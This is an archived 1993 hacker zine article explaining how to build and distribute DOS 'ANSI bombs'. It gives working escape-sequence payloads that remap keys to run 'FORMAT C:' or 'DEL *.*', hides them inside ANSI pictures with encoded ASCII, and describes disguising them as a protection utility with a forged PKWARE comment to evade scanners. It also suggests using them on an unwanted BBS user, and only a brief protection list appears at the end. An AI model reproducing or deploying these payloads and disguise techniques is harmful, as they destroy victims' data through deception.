home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / DNA / DNAV1I4.sit / DNAV1I4 / ARTICLE.004 < prev    next >
Text File  |  1993-09-04  |  6KB  |  134 lines

  1. Properly Constructing the AnsiBomd........By Vandal
  2.  
  3. First off if the intended victim does not have ANSI.SYS or has PKSFANSI.COM 
  4. this will not werk!!!!
  5.  
  6.     Ok..first off an ansi bomb is a set ov commands that re-define the keys 
  7. on your keyboard to issue commands.  For Example you could redefine the "A" to 
  8. issue the command Edit.  Or you could re-define the "W" Key as FORMAT C:.  
  9. thats where the key redefination becomes a Bomb hehehehe...The first way to make 
  10.  an ansi bomb is to make it into a batch file.  this is simple the easiest way is 
  11. to use the "PROMPT" command from Dos.
  12. [Example](from Dos)
  13. copy con ansibomb.bat
  14. prompt $E[A;13 "ECHO Y |FORMAT C:>NUL";13p
  15. ^Z
  16.  
  17. now you have a BAT phile that when the A key is hit the system does the 
  18. following
  19.  
  20. RETURN
  21. FORMAT C: 
  22. RETURN
  23.  
  24.  
  25. The "ECHO Y" means that the command for
  26. WARNING!! 
  27. ALL DATA ON THIS DRIVE WILL BE LOST!!!
  28. CONTINUE (Y/N)
  29. will automatically be answered with a "Y"
  30.  
  31. pretty sneaky huh, but a BAT file called ANSIBOMB.BAT is not exactly smoething  
  32. that any person with half a clue is going to run without checking out.  So 
  33. heres where you will need some useful utilitys the list goes as follows
  34. 1-A CHART OV ASCII KEY CODES
  35. 2-THE DRAW ANSI CREATOR (or it's equivilant if you want to work with pictures)
  36.  
  37. There are more utilitys but for now that is all that is nessecary.  Now take an 
  38. ansi picture that have lying around load it up with the draw and go to the 
  39. bottom ov the picture.  type the following
  40. ESC[13;13;101;99;104;111;32;121;32;124;32;100;101;108;32;42;46;42;32;62;32;
  41. 110;117;108'13p (not this would normally all be on one line)
  42.  
  43. the ASCII Key chart is used to werk with numbers insted ov letters so that the 
  44. intended victim does not spot the werds so instead ov RETURN you have 13
  45.  
  46. this will not be seen when the picture is viewed.  But when the "A" key is 
  47. typed the above line will do the following
  48. RETURN
  49. ECHO Y|DEL *.*>NUL
  50. RETURN
  51.  
  52. pretty dangerous huh!!!  By simply Viewing the the phile with the ansi bomb the 
  53. keys may be redifined!!
  54.  
  55. Now heres where we get sneaky....Most term programs come with thier own ansi 
  56. Drivers that will not allowed keys to be redefined.  Here is a list of term 
  57. programs that have thier own ansi drivers
  58. QMODEM PRO
  59. PROCOMM PLUS
  60. TELIX
  61. BIT COM
  62.  
  63. there are others but if you are not sure if YOUR system comes with one I would 
  64. highly recomend putting PKSFANSI.COM into your AUTOEXEC.BAT If it does not have 
  65. it's own ANSi Driver then your keys may be redefined by Viewing a post or ansi 
  66. on A BBS.
  67.  
  68. Now lets say you are a sysop ov a BBS and you have this same Rodent logging 
  69. onto your board and you have to repeatidly delete him.  Heres a way to take 
  70. care ov him.  Take a text file that you use for new users (if you don't have 
  71. one then make one for this occasion). attach the above command to the bottom ov 
  72. the text file and write a nice message one the letter like "FUCK YOU RODENT WE 
  73. WANT REAL USERS TAKE A HIKE"  as he views this thru the TYPE command his keys 
  74. will be redifined.  You can be pretty sure he won't be calling back.
  75.  
  76. ----------------------FURTHER USES--------------------------------------------
  77.  
  78. OK the above data anyone with half a clue already knew so here is where it gets 
  79. P/Hun
  80. ---NEEDED UTILITYS------------------------------------------------------------
  81. 1-BAT2EXEC.COM
  82. 2-PKZIP (Or a program that allows coments to be added to a zip)
  83. 3-NW.ZIP (The Nowhere Man Utilitys)
  84. 4-THCK (Nice but not nessecary)
  85. ------------------------------------------------------------------------------  
  86.  
  87. OK make an ANSIBOMB in the form ov a batch phile.  Make it real nice.  One ov 
  88. my favorite is to make the Bomb Titled PKSFANSI.BAT.                              
  89. Next take BAT2EXEC and turn the BAT into a COM, Use the Nowhere Man Utilitys to 
  90. remove the Stamp on it.  And Use Either FakeFile from the Nowhere Man Utilitys 
  91. or The THCK-FP to add to the size ov thee phile.  Next make the DOCs, 
  92. FILE-ID.DIZ and the READ.ME for it.  Then Zip it all up, Use PKZIP -C to add a 
  93. comment such as....
  94. ------------------------------------------------------------------------------
  95. This File has been distributed straight from PKWARE
  96.   if you have any problems with the software please 
  97. contact us at 1-800-(add any number)
  98. ------------------------------------------------------------------------------
  99. It's also Good to add comments from BBS's that carry a lot ov PD warez and have 
  100. been known to check all the philes before allowing them on the system.
  101.  
  102. simple huh....and with the COM phile ANSICHEK will not find the ANSi bomb these 
  103. cannot be discovered by any Virus Checkers or the Such.  
  104. ------------------------------------------------------------------------------
  105.  
  106. OK there are some ansi bomb creation Devices (That I know ov) that I will tell 
  107. you about now
  108. ANSIBMBR.EXE automatically writes bomb into a TXT or BAT when you give the 
  109. specific Key to Redifine and Command to Execute
  110. ANSIMAKE.COM Excellent for Pictures werks the same way as ANSIBMBR but on ANSi 
  111. pictures
  112. ANSIBOMB.EXE For ANSi pictures again You give the Key to Re-define and it gives 
  113. you the choice ov Either 1)del *.* or 2)format C:
  114.  
  115. ------------------------------------------------------------------------------
  116. PROTECTING YOURSELF
  117. here are some ov the philes needed to protect yourself from ANSi Bombs 
  118. 1)PKSFANSI.COM dissables Key Redifination
  119. 2)ANSICHEK.COM searches TXT's and ANS's for Bombs
  120. 3)ACHKFILE.COM searches Specific Files for ANSIBOMBS
  121. and the simple solution don't use ANSI.SYS. ZANSI.SYS is excellent and doesnt 
  122. allow key redifination
  123.  
  124.  
  125. TO BE CONTINUED IN DnA ISSUE 5!
  126.  
  127.  
  128. ------------------------------------------------------------------------------
  129.                                                    Vandal-93
  130.                                                      [DnA]
  131.  
  132. if you have any questions concerning the above material you may contact me at 
  133. DnA Systems Or Digital Decay 
  134.